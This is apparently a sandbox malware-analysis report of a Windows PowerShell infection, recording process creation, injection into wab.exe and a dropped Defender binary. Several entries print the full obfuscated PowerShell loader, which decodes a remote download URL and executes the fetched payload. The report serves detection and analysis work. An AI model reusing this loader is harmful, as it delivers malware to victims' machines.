Source: Yara match File source: amsi64_1716.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4340000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 30AFAB0 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.cistanakaravlslag. ');$ame
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.ci
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.cistanakaravlslag. ');$ame Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.ci Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
